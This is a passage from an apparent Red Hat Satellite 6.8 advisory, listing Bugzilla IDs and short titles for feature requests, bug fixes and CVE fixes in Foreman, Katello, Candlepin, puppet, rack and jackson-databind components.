[RFE] When the contentAccessMode is set to org_environment for an owner, we should disable auto-attach globally\n1719509 - [RFE] \"hammer host list\" including erratas information\n1719516 - [RFE] \"hammer host-collection hosts\" including erratas information\n1720725 - [RFE] Ability to override DHCP options and wait_after_restart option for race condition\n1721419 - SSH key cannot be added when FIPS enabled\n1722954 - Slow performance when running \"hammer host list\" with a high number of Content Hosts (15k+ for example)\n1723313 - foreman_tasks:cleanup description contain inconsistent information\n1724494 - [Capsule][smart_proxy_dynflow_core] \"PID file /var/run/foreman-proxy/smart_proxy_dynflow_core.pid not readable (yet?) after start\"\n1724497 - CVE-2019-12781 Django: Incorrect HTTP detection with reverse-proxy connecting via HTTPS\n1726768 - [RFE] Red Hat Satellite 6 GUI, Tasks should show Full name\n1729968 - Editing disk size of a Compute Profile for a VMware Compute Resource makes the whole Storage section disappear\n1730083 - [RFE] Add Jobs button to host detail page\n1731155 - Cloud init template missing snippet compared to Kickstart default user data\n1731229 - podman search against Red Hat Satellite 6 fails. \n1731235 - [RFE] Create Report Template to list inactive hosts\n1733241 - [RFE] hammer does not inherit parent location information\n1733650 - Satellite receives RPM1004 pulp error and 403 Forbidden http error retrieving packages from CDN\n1736809 - undefined method `split\u0027 for nil:NilClass when viewing the host info with hammer\n1737135 - Content Hosts loses subscriptions after Vmotion and auto attach is unable to assigned the subscriptions if any other subscription is already attached to the host. \n1737564 - [RFE] Support custom images on Azure\n1738548 - Parameter --openscap-proxy-id is missing in hammer host create command. \n1740943 - Increasing Ansible verbosity level does not increase the verbosity of output\n1743056 - While creating a host for a particular location, all the domains are in the pull down list, even if only one domain is selected for that location. \n1743776 - Error while deleting the content view version. \n1745516 - Multiple duplicate index entries are present in candlepin database\n1746936 - satellite6 is not using remote execution by default even after setting remote execution by default from satellite web-UI. \n1749692 - Default Rhel8 scap content does not get populated on the Satellite\n1749916 - [RFE] Satellite should support certificates with \u003e 2048 Key size\n1751981 - Parent object properties are not propagated to Child objects in Location and Host Group\n1752880 - katello-host-tools-tracer stats paths abusively, leading to a hang or slowness of yum command\n1753551 - Traces output from Satellite GUI has mismatches with client tracer output\n1756991 - 2 inputs with same name -\u003e uninitialized constant #\u003cClass:0x000000000b894c38\u003e::NonUniqueInputsError\n1757317 - [RFE] Dynflow workers extraction\n1757394 - [BUG] Non-admin users always get \"Missing one of the required permissions\" message while accessing their own table_preferences via Satellite 6 API\n1759160 - Rake task for cleaning up DHCP records on proxy\n1761872 - Disabled buttons are still working\n1763178 - [RFE] Unnecessary call to userhelp and therefore log entries\n1763816 - [RFE] Report which users access the API\n1766613 - Fact search bar broken and resets to only searching hostname\n1766906 - Associating more than 10 Ansible roles to a Host only sets based on the per-page setting\n1767497 - Compute Resource filter does not correctly allow Refresh Cache\n1767635 - [RFE] Enable Organization and Location to be entered not just selected\n1770366 - [RFE] Improve upgrade efficiency by moving RPM post-installation scripts to the installer. \n1770544 - Puppet run job notification do not populate \"%{puppet_options}\"\u0027 value\n1770777 - Changing concurrency level while executing Ansible jobs fail with NoMethodError: undefined method `[]\u0027 for nil:NilClass\n1771367 - undefined method `request_uri\u0027 when Openidc Provider Token Endpoint is none\n1771428 - Openscap documentation link on Satellite 6 webui is broke\n1771484 - Client side documentation links are not branded\n1771693 - \u0027Deployed on\u0027 parameter is not listed in API output\n1772381 - Incorrect example to use multiple attributes as a matcher key in the tooltip for Order\n1772517 - login with the user name as same as existing user group gives 500 ISE and wont allow user to login again\n1772544 - Use APIv4 is not the default when creating a new compute resource in ovirt\n1773298 - GET /katello/api/srpms/compare always fails with error: Missing template katello/api/v2/common/compare\n1774710 - UI: When selecting the server type in ldap authentication, \"attribute mappings\" fields could be populated automatically\n1778396 - exporting/importing report template process is causing a different report during the visualization (blank lines)\n1778503 - Prepended text on OS name creation\n1778681 - Some pages are missing title in html head\n1779638 - Unable to filter/search http-proxies using Organization/Location for Satellite UI. \n1781671 - While using concurrency_level in remote execution, job progress in WebUI is not being updated properly\n1782352 - [RHEL 8.1 client] All packages are not getting updated after click on \"Update All Packages\"\n1782426 - Viewing errata from a repository returns incorrect unfiltered results\n1783568 - [RFE] - Bulk Tracer Remediation\n1783882 - Ldap refresh failed with \"Validation failed: Adding would cause a cycle!\"\n1784012 - Default kickstart places log to /mnt/sysimage/root/install.post.log\n1784341 - disable CertificateRevocationListTask job in candlepin.conf by default\n1785117 - [RFE] Add functionality in foreman logging to hash-out or mark as [FILTERED] the password in /var/log/foreman-maintain/foreman-maintain.log and /var/log/foreman-installer/satellite.log file\n1785231 - Ansible Variable override to false does not gets reflected on client machine on Red Hat Satellite 6. \n1785624 - [UI] Importing templates with associate \u0027never\u0027 is not resulting as expected\n1785683 - Does not load datacenter when multiple compute resources are created for same VCenter\n1785902 - Ansible RunHostJob tasks failed with \"Failed to initialize: NoMethodError - undefined method `[]\u0027 for nil:NilClass\"\n1785940 - [RFE] Reporting template should allow host filtering based on applicable errata issue date\n1787329 - change filename in initrd live CPIO archive to fdi.iso\n1788261 - CVE-2018-11751 puppet-agent: Puppet Agent does not properly verify SSL connection when downloading a CRL\n1788958 - [RFE] add \"elapsed time\" column to export and hammer, make it filterable in WebUI\n1789006 - Smart proxy dynflow core listens on 0.0.0.0\n1789100 - CVE-2019-16782 rubygem-rack: hijack sessions by using timing attacks targeting the session id\n1789434 - Template editor not always allows refreshing of the preview pane\n1789522 - On unhealthy Satellite, dynflow_envelopes table might grow indefinitely\n1789686 - Non-admin user with enough permissions can\u0027t generate report of applicable errata\n1789815 - The \"start\" parameter should be mentioned inside \"--compute-attributes:\" in hammer_cli for Satellite 6\n1789911 - \"foreman-rake katello:publish_unpublished_repositories\" is referring to column which no longer exists in katello_repositories table. \n1789924 - [RFE] As user I want to see a \"disabled\" status for Simple Content Access (Golden Ticketed) Orgs\n1791654 - drop config_templates api endpoints and parameters\n1791656 - drop deprecated host status endpoint\n1791658 - drop reports api endpoint\n1791659 - Remove `use_puppet_default` api params\n1791663 - remove deprecated permissions api parameters\n1791665 - drop deprecated compute resource uuid parameter\n1792131 - [UI] Could not specify organization/location for users that come from keycloak\n1792135 - Not able to login again if session expired from keycloak\n1792174 - [RFE] Subscription report template\n1792304 - When generating custom report, leave output format field empty\n1792378 - [RFE] Long role names are cut off in the roles UI\n1793951 - [RFE] Display request UUID on audits page\n1794015 - When using boot disk based provisioning, sometimes foreman tries to recreate folder foreman_isos in the datastore even when the folder already exists\n1794346 - Change the label for the flashing eye icon during user impersonation\n1794641 - Sync status page\u0027s content are not being displayed properly. \n1795809 - HTML tags visible on paused task page\n1796155 - [RFE] host_collections not available in reporting engine unless safe mode disabled\n1796205 - iso upload: correctly check if upload directory exists\n1796225 - CVE-2020-7238 netty: HTTP Request Smuggling due to Transfer-Encoding whitespace mishandling\n1796259 - loading subscriptions page is very slow\n1796697 - Unable to list/enable EUS repositories on the RHEL clients registered in the satellite server with org_environment contentAccessMode\n1798489 - [RHSSO] - If Access Token Lifespan is set to 5 mins then the user is getting sign out instead after idle SSO timeout\n1798668 - Configure default MongoDB WiredTiger cache to be 20% of RAM in the Satellite server\n1799480 - CLI - hammer repository info shows blank sync status if the repository sync is in warning/error state. \n1800503 - In Hammer, it is not possible to set default keyboard layout for a RHEV host\n1801264 - CVE-2020-5217 rubygem-secure_headers: directive injection when using dynamic overrides with user input\n1801286 - CVE-2020-5216 rubygem-secure_headers: limited header injection when using dynamic overrides with user input\n1802529 - Repository sync in tasks page shows percentage in 17 decimal points\n1802631 - Importing Ansible variables yields NoMethodError: undefined method `map\u0027 for nil:NilClass (initialize_variables) [variables_importer.rb]\n1803846 - Red Hat Insights Risk Summary shows systems at risk while there are none\n1804496 - While performing bulk actions, unable to select all tasks under Monitor --\u003e Tasks page. \n1804651 - Missing information about \"Create Capsule\" via webUI\n1805501 - CVE-2020-10693 hibernate-validator: Improper input validation in the interpolation of constraint error messages\n1805727 - Default Custom Repository download policy setting refers to old name (Default Repository download policy) in satellite 6.7\n1806713 - hypervisor checkin fails with cp_consumer_hypervisor_ukey error\n1806842 - Disabling dynflow_enable_console from setting should hide \"Dynflow console\" in Tasks\n1806897 - Red Hat Inventory Uploads fail with NoMethodError: undefined method `mtu\u0027\n1807042 - [RFE] Support additional disks for VM on Azure Compute Resource\n1807321 - A non-admin users with view recurring_logics permissions are unable to list recurring logics. \n1807829 - Generated inventory file doesn\u0027t exist\n1807946 - Multiple duplicate index entries are present in foreman database\n1808843 - Satellite lists unrelated RHV storage domains using v4 API\n1810250 - Unable to delete repository - Content with ID could not be found\n1810549 - dropping packets to qdrouterd triggers a memory leak in qpid-proton 0.28.0-2 libraries used by goferd\n1810774 - Applying errata via Host Collection the errata are trying to be applied to all hosts associated with the host collection\n1811390 - Links to an errata list of a repository lack repositoryId in URI and points to generic \"errata\" page instead\n1812031 - Improve regenerate applicability tasks performance by querying NEVRA only data from repo_content_units\n1812858 - Satellite Inventory Plugin does not appear to make reports which match yupana\u0027s API specification\n1812904 - \u0027Hypervisors\u0027 task fails with \u0027undefined method `[]\u0027 for nil:NilClass\u0027 error\n1813005 - Prevent --tuning option to be applied in Capsule servers\n1813313 - [Tracker] Test HTTP UEFI on IPv6 (QA only tracker)\n1814095 - Applicable errata not showing up for module stream errata\n1815104 - Locked provisioning template should not be allowed to add audit comment\n1815135 - hammer does not support description for custom repositories\n1815146 - Backslash escapes when downloading a JSON-formatted report multiple times\n1815608 - Content Hosts has Access to Content View from Different Organization\n1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking\n1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config\n1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap\n1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core\n1816699 - Satellite Receptor Installer role can miss accounts under certain conditions\n1816720 - CVE-2020-7942 puppet: Arbitrary catalog retrieval\n1816853 - Report generated by Red Hat Inventory Uploads is empty. \n1817215 - Admin must be able to provide all the client ids involved inside Satellite settings. \n1817224 - Loading one org\u0027s content view when switching to a different org\n1817481 - Plugin does not set page \u003ctitle\u003e\n1817728 - Default task polling is too frequent at scale\n1817874 - After data upload from satellite UI it is not visible on cloud.redhat.com. \n1818062 - Deprecated message about katello agent being shown on content host registration page\n1818816 - Web console should open in a new tab/window\n1819145 - [RFE] Incorporate apipie-dsl to document template macros, provided as one-time generated HTML document\n1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider\n1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane\n1820193 - Deleted Global Http Proxy is still being used during repository sync. \n1820245 - reports in JSON format can\u0027t handle unicode characters\n1821182 - [Repository] - Packages are not getting synced with rpm-with-sha-512\n1821335 - Inventory plugin captures information for systems with any entitlement\n1821457 - [RFE] Capsules shouldn\u0027t update hosts\u0027 \"Registered through\" facts on the Satellite server in a load-balanced configuration. \n1821629 - Eager zero seems to do nothing\n1821651 - Manifest import task progress remains at 0. \n1821752 - New version of the plugin is available: 1.0.5\n1822039 - Get HTTP error when deploying the virt-who configure plugin\n1822560 - Unable to sync large openshift docker repos\n1823905 - Update distributor version to sat-6.7\n1823991 - [RFE] Add a more performant way to sort reports\n1824183 - Virtual host get counted as physical hosts on cloud.redhat.com\n1824931 - After upgrading to Satellite 6.7 the Tasks page in WebUI goes \"Blank\"\n1825760 - schedule inventory plugin sync failed due to \u0027organization_id\u0027 typecasting issue. \n1825930 - [Regression] RedHat Insights client proxying stopped working due to missing proxy\n1825978 - Manifest refresh failed with \u0027Katello::Errors::CandlepinError Invalid credentials.\u0027 error\n1826298 - even when I cancel ReX job, remediation still shows it as running\n1826340 - [RFE] Ability to provision a VM using Red Hat Gold BYOS images\n1826515 - [RFE] Consume Candlepin events via STOMP\n1826625 - Improve performance of externalNodes\n1826678 - New version of the plugin is available: 2.0.6\n1826734 - Tasks uses wrong controller name for bookmarks\n1826805 - CVE-2020-11619 jackson-databind: Serialization gadgets in org.springframework:spring-aop\n1827389 - Manifest import and delete calls Actions::Pulp::Repository::Refresh for non-Library repositories\n1827583 - Installing dhcp_isc and dhcp_remote_isc fails with \"You cannot specify the same gem twice with different version requirements.....You specified: rsec (\u003c 1) and rsec (\u003e= 0)\"\n1828257 - Receptor init file missing [Install] section, receptor service won\u0027t run after restart\n1828486 - CVE-2020-7943 puppet: puppet server and puppetDB may leak sensitive information via metrics API\n1828549 - Manifest Certificate Exposed by Unprivileged User\n1828682 - Create compute resource shows console error \u0027Cannot read property \u0027aDataSort\u0027 of undefined\u0027\n1828789 - [RFE] Satellite installer should support installing the Satellite Inventory Provider by default\n1828868 - Add keep alive option in Receptor node\n1829487 - Ansible verbosity level does not work\n1829766 - undefined method `tr\u0027 for nil:NilClass when trying to get a new DHCP lease from infoblox\n1830253 - Default job templates are not locked\n1830403 - Capsule sync fails when promoting a content view to more than one lifecyle env at the same time\n1830834 - Unable to update default value of a smart class parameter (Sql query error). \n1830860 - Refactor loading regions based on subscription dynamically\n1830882 - Red Hat Satellite brand icon is missing\n1830884 - bootstrap.py script tries to yum install puppet package that is not in rhel-7-server-satellite-tools-6.7-rpms repo\n1831528 - CVE-2020-5267 rubygem-actionview: views that use the `j` or `escape_javascript` methods are susceptible to XSS attacks\n1833031 - Improve RH account ID fetching in cloud connector playbook\n1833035 - Add remediation bulk ack message (i.e. all hosts for a given run has finished)\n1833039 - Introduce error code to playbook_run_finished response type\n1833311 - \"Failed to save: Failed to save when overriding parameters for ansible, cause: Default value is invalid\" while creating scap policy with ansible deployment option. \n1834302 - --enable-foreman-plugin-rh-cloud fails: Execution of \u0027/bin/yum -d 0 -e 0 -y install tfm-rubygem-foreman_rh_cloud\u0027 returned 1: Error: Nothing to do\n1834377 - Disable mongo FTDC\n1834866 - Missing macro for \"registered_at\" host subscription facet\n1834898 - Login Page background got centralized and cropped\n1835189 - Missing macro for \"host_redhat_subscriptions\" in host subscription facet\n1835241 - Some applicability of the consumers are not recalculated after syncing a repository\n1835882 - While executing \"Configure Cloud Connector\" playbook on Satellite 6.7 server it does not honour HTTP Proxy setting\n1836155 - Support follow on rails, travis and i18n work for AzureRm plugin\n1836771 - In satellite installation summary report, satellite should be mentioned instead of foreman. \n1836774 - Some foreman services failed to start (pulp_streamer)\n1836845 - \"Generate at\" in report template should be current date\n1837951 - \"invalid Unicode Property \\p: /\\b\\perform various actions through those proxies\\b(?!-)/\" warning messages appears in dynflow-sidekiq@worker-hosts-queue\n1838160 - \u0027Registered hosts\u0027 report does not list kernel release for rhsm clients\n1838191 - Arrow position is on left rather in the middle under \"Start Time\"\n1838281 - CVE-2020-8161 rubygem-rack: directory traversal in Rack::Directory\n1838917 - Repositories are not showing their available Release versions due to a low default db pool size\n1838963 - Hypervisors from Satellite, never makes their way to HBI\n1838965 - Product name link is not working on the activation keys \"Repository Sets\" tab. \n1839025 - Configure Cloud Connector relies on information which is no longer provided by the API\n1839649 - satellite-installer --reset returns a traceback\n1839726 - Bring tfm-rubygem-foreman_leapp to downstream builds\n1839779 - undefined local variable or method `implicit_order_column\u0027 for #\u003cActiveRecord::Associations::CollectionProxy\u003e on GET request to /discovery_rules endpoint\n1839966 - New version of the plugin is available: 2.0.7\n1840166 - ERF42-4995 [Foreman::Exception]: Invalid authenticity token message displayed with traceback, If re-login the machine after session timed-out . \n1840191 - Validate parameters passed by receptor to the receptor-satellite plugin\n1840218 - ArgumentError: wrong number of arguments\n1840525 - Content host list doesn\u0027t update after the successful deletion of content host. \n1840635 - Proxy has failed to load one or more features (Realm)\n1840723 - Selected scenario is DISABLED, can not continue\n1840745 - Satellite installation failed with puppet error \" No Puppet module parser is installed\"\n1841098 - Failed to resolve package dependency while doing satellite upgrade. \n1841143 - Known hosts key removal may fail hard, preventing host from being provisioned\n1841573 - Clicking breadcrumb \"Auth Source Ldaps\" on Create LDAP Auth Source results in \"The page you were looking for doesn\u0027t exist.\"\n1841818 - icons missing on /pub download page\n1842900 - ERROR! the role \u0027satellite-receptor\u0027 was not found in ... \n1842943 - ~foreman-proxy/.ssh is a symlink to /usr/com/foreman-proxy/ssh/\n1843406 - In 6.8, Receptor installation playbook\u0027s inputs are visible again\n1843561 - Report templates duplicated\n1843846 - Host - Registered Content Hosts report: \"Safemode doesn\u0027t allow to access \u0027report_hraders\u0027 on #\u003cSafemode::ScopeObject\u003e\"\n1843867 - Satellite-installer failed with argument error while upgrading the satellite from 6.7 to 6.8\n1843926 - satellite-change-hostname fails when running nsupdate\n1844142 - [RFE] Drop a subsription-manager fact with the satellite version\n1845112 - Installer deploys outdated version of pxegrub2 mac template to TFTP\n1845486 - [RFE] Able to select \u0027HTTP Proxy\u0027 during Compute Resource create for \u0027GCE\u0027 as similar to EC2\n1845860 - hammer org add-provisioning-template command returns Error: undefined method `[]\u0027 for nil:NilClass\n1845978 - CVE-2020-7663 rubygem-websocket-extensions: ReDoS vulnerability in Sec-WebSocket-Extensions parser\n1846254 - need to restart services after enabling leapp plugin\n1846313 - Add index on locks for resource type and task id\n1846317 - undefined method `klass\u0027 for nil:NilClass\n1846421 - build pxe default do not work when more than 1 provider\n1846593 - Satellite-installer failed with error \"Could not find a suitable provider for foreman_smartproxy\" while doing upgrade from 6.7 to 6.8\n1847019 - Empty applicability for non-modular repos\n1847063 - Slow manifest import and/or refresh\n1847407 - load_pools macro not in list of macros\n1847645 - Allow override of Katello\u0027s DISTRIBUTOR_VERSION\n1847784 - Error updating system data on the server, see /var/log/rhsm/rhsm.log for more details. \n1847840 - Libvirt note link leads to 404\n1847871 - Combined Profile Update: ArgumentError: invalid argument: nil. \n1848291 - Download kernel/initram for kexec asynchronously\n1848535 - Unable to create a pure IPv6 host\n1848538 - Failed to resolve the packages due to tfm-runtime package dependency in fm-upgrade(6.7 to 6.8)\n1848902 - ERF42-0258 [Foreman::Exception]: \u003cuuid\u003e is not valid, enter id or name\n1848958 - CVE-2020-14195 jackson-databind: serialization in org.jsecurity.realm.jndi.JndiRealmFactory\n1848962 - CVE-2020-14062 jackson-databind: serialization in com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool\n1848966 - CVE-2020-14061 jackson-databind: serialization in weblogic/oracle-aqjms\n1848973 - capsule-certs-generate suggests running foreman-installer --scenario foreman-proxy-content instead of satellite-installer --scenario capsule\n1849141 - CVE-2020-8184 rubygem-rack: percent-encoded cookies can be used to overwrite existing prefixed cookie names\n1849656 - ERROR! You cannot use loops on \u0027import_tasks\u0027 statements. You should use \u0027include_tasks\u0027 instead. \n1849680 - Task progress decimal precision discrepancy between UI, CLI, and API\n1849869 - Unable to recycle the dynflow executor\n1850355 - Auth Source Role Filters are not working in Satellite 6.8\n1850536 - Can\u0027t add RHEV with APIv3 through Hammer\n1850914 - Checksum type \"sha256\" is not available for all units in the repository. Make sure those units have been downloaded\n1850934 - Satellite-installer failed with error \"Could not evaluate: Proxy xyz..com cannot be retrieved: unknown error (response 502)\"\n1851017 - Position of text cursor in ace-editor wrong and hence unable to edit templates\n1851030 - [RFE] Upgrade Ansible used from RHEL to be 2.9\n1851167 - Autoattach -\u003e \"undefined\" subscription added\n1851176 - Subscriptions do not provide any repository sets\n1851952 - \"candlepin_events FAIL Not running\" and wont restart\n1852371 - Allow http proxy ports by default\n1852723 - Broken link for documentation on installation media page\n1852733 - Inventory upload documentation redirects to default location\n1852735 - New version of the plugin is available: 2.0.8\n1853076 - large capsule syncs cause slow processing of dynflow tasks/steps\n1853200 - foreman-rake-db:migrate Fails on \"No indexes found on foreman_tasks_locks with the options provided\"\n1853280 - Content view filter is excluding modules and Packages when published after upgrading the Satellite from 6.6 to 6.7\n1853463 - Plugin does not upload inventory - Permission denied /var/lib/foreman/red_hat_inventory/uploads/uploader.sh\n1853504 - [Regression] Hammer export-legacy Fails with Composite Content Views\n1853572 - Broken documentation link for \u0027RHV\u0027 in Compute Resource\n1854138 - System purpose status should show as \u0027disabled\u0027 when Satellite is in Simple Content Access mode. \n1854397 - Compliance reports are not being uploaded to satellite. \n1854530 - PG::NotNullViolation when syncing hosts from cloud\n1855008 - Host parameters are set after the host is created. \n1855254 - Links to documentation broken in HTTP Proxies setup\n1855348 - katello_applicability accidentally set to true at install\n1855710 - \u0027Ensure RPM repository is configured and enabled\u0027 task says \u0027FIXME\u0027\n1856370 - Clicking on any other tab other than overview while on capsule synchronizing page, redirects to overview page. \n1856379 - Add missing VM creation tests\n1856401 - [RFE] Add module to create HTTP Proxy\n1856831 - New version of the plugin is available: 2.0.9\n1856837 - undefined method \u0027#httpboot\u0027 for NilClass::Jail (NilClass) when creating an IPv6 only host\n1857124 - Attempting to attach a subscription to an unregistered host results in ISE 500\n1857146 - Unable to build a host bootdisk image due to missing dosfstools package - Failed to format the ESP image via mkfs.msdos\n1857184 - selinux is preventing to build a bootdisk iso - Failed to format the ESP image via mkfs.msdos\n1857377 - Capsule Upgrade Playbook fails with \"Failed to initialize: NoMethodError - undefined method `default_capsule\u0027 for Katello:Module\"\n1857506 - Capsule Upgrade Fail: satellite-installer --scenario capsule --upgrade throws NameError\n1857572 - tailoring-file and scap-content command of hammer downloads file with wrong filename. \n1857726 - Warnings are shown during the satellite package installation on RHEL 7.9\n1858237 - Upgraded Satellite has duplicated katello_pools indexes\n1858284 - CVE-2020-14334 foreman: unauthorized cache read on RPM-based installations through local user\n1858819 - katello-certs-check output print foreman-installer--scenario katello instead satellite-installer --scenario satellite\n1858855 - Creating compute resources on IPV6 network does not fail gracefully\n1859158 - Unknown HTTPBoot EFI hosts are not directed to the grubx64.efi with a default grub conf\n1859194 - load_hosts macro duplicated in a list of macros\n1859276 - Need to update the deprecation warning message on Statistics and Trends page. \n1859705 - Tomcat is not running on fresh Capsule installation\n1859929 - User can perform other manifest actions while the first one starts\n1860351 - \u0027Host - compare content hosts packages\u0027 report fails with error \u0027undefined method \u0027#first\u0027 for NilClass\u0027\n1860407 - remote job-status table should not be re-loaded every second even if a job is running or completed\n1860422 - Host with remediations can\u0027t be removed\n1860430 - \u0027Host - compare content hosts packages\u0027 report: Safemode doesn\u0027t allow to access \u0027version\u0027... \n1860444 - After the system reboot, capsule setup(upgraded or newly installed 6.8 capsule) fails to start the tomcat service\n1860519 - Browsing capsule /pub directory with https fails with forbidden don\u0027t have permission to access /pub/ error. \n1860585 - Content Host Registration page showing version 6.7 for repos instead 6.8\n1860587 - Documentation link in Administer -\u003e About pointing to 6.6 document. \n1860835 - Installed Packages not displayed on About page\n1860957 - Unable to select an organization for sync management\n1861367 - Import Template sync never completes\n1861397 - UI dialog for Capsule Upgrade Playbook job doesn\u0027t state whitelist_options is required\n1861422 - Error encountered while handling the response, replying with an error message (\u0027plugin_config\u0027)\n1861656 - smart-proxy-openscap-send command fails to upload reports to satellite. \n1861724 - ipv6: host form in interfaces are showing Error generating IP: Bad Request\n1861766 - Add ability to list traces by host with hammer\n1861807 - Cancel/Abort button should be disabled once REX job is finish\n1861816 - Error only on production builds: The Dynflow world was not initialized yet. If your plugin uses it, make sure to call Rails.application.dynflow.require! in some initializer\n1861831 - satellite-change-hostname cannot change the satellite hostname after failing. \n1861890 - Recommended repos do not match Satellite version\n1861970 - Content -\u003e Product doesn\u0027t work when no organization is selected\n1862135 - updating hosts policy using bulk action fails with sql error\n1862445 - compliance policy creation fails for ansible deployment option on upgraded satellite. \n1862772 - Default repositories are not enabled, after registering a client with an Activation Key, to an org with Simple Content Access Mode in Red Hat Satellite 6\n1865871 - Obfuscated hosts do not have domain reported\n1865872 - Templates doc - examples on onepage.html are not processed\n1865874 - Add inventory status to host\n1865876 - Make recommendations count in hosts index a link\n1865879 - Add automatic scheduler for insights sync\n1865880 - Add an explanation how to enable insights sync\n1865928 - Templates documentation help page has hard-coded Satellite setting value\n1865943 - dynflow-sidekiq results in messages logs getting filled up more frequently\n1866029 - Templates DSL documentation: Parts of description are put in \u003cpre\u003e tag\n1866436 - host search filter does not work in job invocation page\n1866461 - Run action is missing in job templates page\n1866515 - ForemanVirtWhoConfigure::AuthSourceHiddenWithAuthentication is displayed on auth sources page\n1866700 - Hammer CLI is missing \"resolve\" (traces) option for katello-tracer\n1866710 - Wrong API endpoint path referenced for resolving host traces\n1867239 - hammer content-view version incremental-update fails with ISE\n1867287 - Error Row was updated or deleted by another transaction when deleting docker repository\n1867311 - Upgrade fails when checkpoint_segments postgres parameter configured\n1867399 - Receptor-satellite isn\u0027t able to deal with jobs where all the hosts are unknown to satellite\n1867895 - API Create vmware ComputeResource fails with \"Datacenter can\u0027t be blank\"\n1868183 - Unable to change virt-who hypervisor location. \n1868971 - Receptor installation job doesn\u0027t properly escape data it puts into receptor.conf\n1869640 - client-dispatcher: wrong number of arguments (given 0, expected 1..3) (ArgumentError)\u0027 messages come in upgrade and installation. \n1869812 - Tasks fail to complete under load\n1870657 - Make rake console run as a dynflow client to allow access to features provided by dynflow\n1871016 - managercli.py:1364 - Error: Unable to retrieve service levels: HTTP error (404 - Not Found)\n1871434 - theme css \".container\" class rule is too generic\n1871729 - ansible-runner implementation depends on third party repository for ansible-runner package. \n1871815 - Satellite Ansible Collection - Provisioning a host fails with timeout\n1871978 - Bug in provisioning_template Module\n1872014 - Enable web console on host error in \"Oops, we\u0027re sorry but something went wrong ERF42-5962 [Foreman::Exception]: No template mapped to feature Enable web console\"\n1872041 - Host search returns incorrect result\n1873408 - Updating the CDN URL is manifest works fine but creates some tasks which remains in planned state with success result\n1873926 - CVE-2020-14380 Satellite: Local user impersonation by Single sign-on (SSO) user leads to account takeover\n1874143 - Red Hat Inventory Uploads does not use proxy\n1874160 - Changing Content View of a Content Host needs to better inform the user around client needs\n1874168 - Sync Plan fails with \u0027uninitialized constant Actions::Foreman::Exception\u0027\n1874171 - [RFE] Allow Subscription-manager service plugin for zypper (SLES) to set autorefresh in repo file\n1874172 - [6.7] Unable to re-import subscriptions in large environment (60k+ content hosts)\n1874175 - After upgrading to 6.7 and promoting content, Capsule sync is extremely slow\n1874176 - Unable to search by value of certain Hostgroup parameter\n1874422 - Hits Sync uses only old proxy setting\n1874619 - Hostgroup tag is never reported in slice\n1875357 - After upgrade server response check failed for candlepin. \n1875426 - Azure VM provision fails with error `requests.exceptions.HTTPError: 502 Server Error: Proxy Error for url`\n1875660 - Reporting Template macros host_cores is not working as expected\n1875667 - Audit page list incorrect search filter\n1877307 - [Authentication] External auth login using Kerberos SSO is failing for AD and IDM on Satellite 6.8 only\n1877354 - [Sat6/Bug] RHEL8 systems generate false positive warnings about repo binding\n1877443 - Post Satellite 6.8 Upgrade AD authentication via LDAP fails when using an A record which returns 42 entries\n1877452 - content set mappings for satellite-tools-6.8-for-rhel-8 AUS repos are missing from cdn/cs_mappings-*.csv\n1877520 - content set mappings for satellite-tools-6.8-for-rhel-8 EUS repos are missing from cdn/cs_mappings-*.csv\n1877542 - content set mappings for rhel7 satellite-tools-6.8 EUS repos are missing from cdn/cs_mappings-*.csv\n1878194 - In Capsule upgrade, \"yum update\" dump some error messages. \n1878556 - PXE provisioning in satellite 6.8 requires httpboot enabled\n1878693 - Unable to perform image based deployment using hosts module from Red Hat Satellite Ansible Collections\n1878850 - creating host from hg doesn\u0027t resolves the user-data template\n1879151 - Remote execution status not updating with large number of hosts\n1879448 - Add hits details to host details page\n1879451 - Stop uploading if Satellite\u0027s setting is disconnected\n1879453 - Add plugin version to report metadata\n1879571 - unable to kexec discovered hosts - satellite tries to reach wrong IP\n1880637 - [6.8] satellite-installer always runs upgrade steps\n1881066 - Safemode doesn\u0027t allow to access \u0027host_cores\u0027 on #\u003cSafemode::ScopeObject\u003e\n1881078 - Use Passenger instead of Puma as the Foreman application server\n1881988 - [RFE] IPv6 support for Satellite 6.8\n1882276 - Satellite installation fails at execution of \u0027/usr/sbin/foreman-rake -- config -k \u0027remote_execution_cockpit_url\u0027 -v \u0027/webcon/=%{host}\u0027\u0027\n1882389 - Search query in template for LEAPP upgrade should be pre-filled when running from pre-upgrade results\n1883093 - installer-upgrade failed with error \"Could not evaluate: Proxy XYZ.com cannot be retrieved: unknown error (response 500)\"\n1883472 - [Sat6.8/Bug] when registering more than ~240 in parallel getting this error \"HTTP error (500 - Internal Server Error): Unable to register system, not all services available\"\n1887483 - Access insights pages refer to non-existing stylesheets, resulting in completely broken visuals\n1887489 - Insights rules can\u0027t be loaded on freshly installed Satellite system\n1887808 - Satellite-installer fails because of outdated RHSCL repository on DVD ISO\n\n6. Package List:\n\nRed Hat Satellite Capsule 